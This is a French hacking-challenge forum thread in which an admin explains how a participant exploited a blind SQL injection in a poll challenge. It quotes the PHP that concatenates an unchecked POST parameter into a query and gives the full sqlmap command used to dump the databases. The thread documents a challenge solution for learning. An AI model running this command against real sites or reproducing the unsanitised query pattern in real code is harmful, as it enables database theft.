S'enregistrer | Rechercher | FAQ | Liste des Membres | Groupes d'utilisateurs | Connexion

  Nom d'utilisateur:    Mot de passe:       

  

Poster un nouveau sujet   Répondre au sujet Page 1 sur 1
Voir le sujet précédent :: Voir le sujet suivant  
Auteur Message
MessagePosté le: Mer Aoû 15, 2012 10:45 pm    Sujet du message: Shiney - Hack [blind SQL] Répondre en citant

Korigan
Site Admin


 
Inscrit le: 29 Mai 2007
Messages: 1781



Shiney a exploité une blind injection SQL sur le challenge sondage.
Il a ainsi eu la possibilité de lire l'ensemble de la base de données.

DĂ©tails :
La faille se situe dans le paramètre sujet qui correspond au numéro du sondage que l'on souhaite noter.

Explication :

Voici le code en question
Code:
$note=$_POST['valeur'];
    $sujet=$_POST['sujet'];
     
    if ($note<=10){ //si le vote n'est pas truquĂ©
            $requete="select total from sondage where id=".$sujet;
            $result=mysql_query($requete);
   


Comme on peut le voir le paramètre sujet est ajouté dans la requete SQL sans être analysé. Shiney a donc pu en prendre le contrôle sans contrainte.

Commande:
Code:
./sqlmap.py -u "http://hackbbs.org/miss/5/valider.php" -p sujet --data="sujet=&valeur=1" --cookie="PHPSESSID=*COOKIE de Shiney*;name=YENIHS;"  --technique=B --string=selectionner  --level=2 --prefix="1 and 1=(select 1 FROM information_schema.tables WHERE 1=1" --suffix=")" --dbs
Voir le profil de l'utilisateur Envoyer un message privés Envoyer un e-mail
MessagePosté le: Jeu Aoû 16, 2012 7:21 am    Sujet du message: Répondre en citant

KEV-1
Modérateur


 
Inscrit le: 20 Oct 2009
Messages: 462



1 seul mot : bravo.
... pour celle la et les autres ... Wink
Voir le profil de l'utilisateur Envoyer un message privés
Poster un nouveau sujet   Répondre au sujet Page 1 sur 1

  


 
Sauter vers:  
Vous ne pouvez pas poster de nouveaux sujets dans ce forum
Vous ne pouvez pas répondre aux sujets dans ce forum
Vous ne pouvez pas éditer vos messages dans ce forum
Vous ne pouvez pas supprimer vos messages dans ce forum
Vous ne pouvez pas voter dans les sondages de ce forum



114264 Attacks blocked